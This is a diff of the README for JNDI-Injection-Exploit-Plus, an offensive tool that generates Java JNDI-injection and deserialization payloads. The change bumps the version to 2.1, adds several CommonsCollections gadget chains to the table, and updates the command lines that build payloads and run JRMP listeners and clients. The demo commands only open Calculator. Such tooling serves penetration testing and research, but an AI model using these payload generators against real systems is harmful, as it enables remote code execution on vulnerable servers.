@@ -35,7 +35,7 @@ Groovy (GroovyClassLoader) | @cckuailong | trustURLCodebase is false but have To
3535Groovy (GroovyShell) | @cckuailong | trustURLCodebase is false but have Tomcat and Groovy in classpath
3636Websphere Readfile | @cckuailong | trustURLCodebase is false but have WebSphere v6-v9 in classpath
3737
38- #### 3. Deserailization Gadget (total: 64 )
38+ #### 3. Deserailization Gadget (total: 73 )
3939
4040P.S. More Gadgets (:arrow_up : ) than ysoserial, welcome to PR more! ^_ ^
4141
@@ -56,15 +56,24 @@ Coherence6 :arrow_up: |@cckuailong |coherence:12.2.1.3
5656CommonsBeanutils1 |@frohoff |commons-beanutils:1.9.2
5757CommonsBeanutils2 :arrow_up : |@cckuailong |commons-beanutils:1.9.2
5858CommonsCollections1 |@frohoff |commons-collections:3.1
59+ CommonsCollections1_1 |@cckuailong |commons-collections:3.1
5960CommonsCollections2 |@frohoff |commons-collections4:4.0
61+ CommonsCollections2_1 |@cckuailong |commons-collections4:4.0
6062CommonsCollections3 |@frohoff |commons-collections:3.1
63+ CommonsCollections3_1 |@cckuailong |commons-collections:3.1
6164CommonsCollections4 |@frohoff |commons-collections4:4.0
6265CommonsCollections5 |@matthias_kaiser, @jasinner |commons-collections:3.1
66+ CommonsCollections5_1 |@cckuailong |commons-collections:3.1
6367CommonsCollections6 |@matthias_kaiser |commons-collections:3.1
68+ CommonsCollections6_1 |@cckuailong |commons-collections:3.1
69+ CommonsCollections6_2 |@cckuailong |commons-collections:3.1
70+ CommonsCollections6_3 |@cckuailong |commons-collections:3.1
6471CommonsCollections7 |@scristalli , @hanyrax , @EdoardoVignati |commons-collections:3.1
72+ CommonsCollections7_1 |@cckuailong |commons-collections:3.1
6573CommonsCollections8 :arrow_up : |@cckuailong |commons-collections4:4.0
66- CommonsCollections9 :arrow_up : |@cckuailong |commons-collections:3.1
74+ CommonsCollections9 :arrow_up : |@cckuailong |commons-collections:3.2. 1
6775CommonsCollections10 :arrow_up : |@cckuailong |commons-collections:3.2.1
76+ CommonsCollections11 :arrow_up : |@cckuailong |commons-collections:3.1
6877FileUpload1 |@mbechler |commons-fileupload:1.3.1, commons-io:2.4 | file uploading
6978Groovy1 |@frohoff |groovy:2.3.9
7079Hibernate1 |@mbechler |
@@ -125,15 +134,15 @@ JbossRemoting | Jboss Remoting Port Unserialization
125134- Example
126135
127136``` shell
128- $ java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
137+ $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " open -a Calculator" -D Jdk7u21 -W Xstream
129138```
130139
131140![ ] ( ./img/4.png )
132141
133142#### Web service to return Deserial Gadgets
134143
135144``` shell
136- java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar
145+ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar
137146```
138147
139148``` shell
@@ -153,7 +162,7 @@ P.S. Param wrapper & output is opetional
153162Run as
154163
155164``` shell
156- $ java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
165+ $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar [-C] [command] [-A] [address]
157166```
158167
159168where:
@@ -183,7 +192,7 @@ Points for attention:
183192Run as
184193
185194``` shell
186- $ java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
195+ $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [base64/hex]
187196```
188197
189198where:
@@ -201,13 +210,13 @@ where:
201210- JRMPListener
202211
203212``` shell
204- java -cp JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
213+ java -cp JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar exploit.JRMPListener < port> CommonsCollections1 calc
205214```
206215
207216- JRMPClient
208217
209218``` shell
210- java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
219+ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " <ip>:<port>" -D " JRMPClient" -O base64
211220```
212221
213222## Examples
@@ -219,7 +228,7 @@ Local demo:
2192281 . Start the tool like this:
220229
221230 ``` shell
222- $ java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
231+ $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -A " 127.0.0.1"
223232 ```
224233
225234 Screenshot:
@@ -250,7 +259,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
250259### Deserialization Payloads
251260
252261``` shell
253- $ java -jar JNDI-Injection-Exploit-Plus-2.0 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
262+ $ java -jar JNDI-Injection-Exploit-Plus-2.1 -SNAPSHOT-all.jar -C " /System/Applications/Calculator.app/Contents/MacOS/Calculator" -D " Spring2" -O base64
254263```
255264
256265Base64 Output Result:
0 commit comments